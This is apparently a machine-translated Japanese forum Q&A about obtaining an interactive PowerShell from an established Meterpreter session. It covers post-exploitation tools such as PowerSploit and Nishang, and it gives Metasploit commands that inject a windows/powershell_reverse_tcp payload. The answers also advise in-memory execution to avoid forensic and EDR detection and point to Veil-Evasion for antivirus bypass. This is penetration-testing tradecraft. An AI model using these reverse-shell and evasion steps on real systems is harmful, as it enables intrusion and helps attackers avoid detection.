私は自分自身に答えようとしたが、あまり成功しなかったという疑問がある。搾取後の目的で提供されるすべてのpowershellスクリプトが大好きです-> Powersploit; Nishangなど...私の唯一の問題は、メータープレビューセッション内でそれらを使用する簡単な方法が見つからないことです。
私が間違っている場合は修正してください。ただし、シェル(meterpreter)から「インタラクティブ」なPowerShellを使用する方法はありません。スクリプトをBase64エンコードに変換し、cmdコマンドを使用して(エンコードされた)関数を1つずつ呼び出す以外に解決策はありません。
(何らかの方法で可能であれば)私がやりたいことは、すでに確立されているMeterpreterセッションからインタラクティブシェルを作成することです(IDS、AV、サンドボックスなどを回避する必要があると考える場合、これを取得するのは本当に難しいことがあります) )。
そのための解決策はありますか?
Metepreter PowerShell拡張機能 を使用します。この場合、PowerShellはシェルアウトせずにメモリ内で実行されます。シェルアウトすると、cmdscanまたはコンソールがVolatilityまたはRekall(またはすべてのEDRおよびDFIRツールが使用する同様の手法)でプロセススペースにフラグを立て、明らかな妥協の結果をもたらします。
Meterpreterセッションが既にある場合は、background
を使用してバックグラウンドに配置します。
次に行います:
use exploit/windows/local/payload_inject
set payload windows/powershell_reverse_tcp
set session <id of session>
set <other options you may need>
run
次に、meterpreterと一緒にPowershellセッションを行います。まだ完全ではありません(タブ補完なし)が、コマンドからの出力を提供します。
meterpreterシェルを入手したら、Powershellを使用できます。 meterpreterと対話してから、Shellコマンドを入力してから、powershell>
ここで、Powershellコマンドに必要な処理を実行させることができます。
簡単な方法でAVを展開するには、Veil-Evasionツールを使用できます https://github.com/Veil-Framework/Veil-Evasion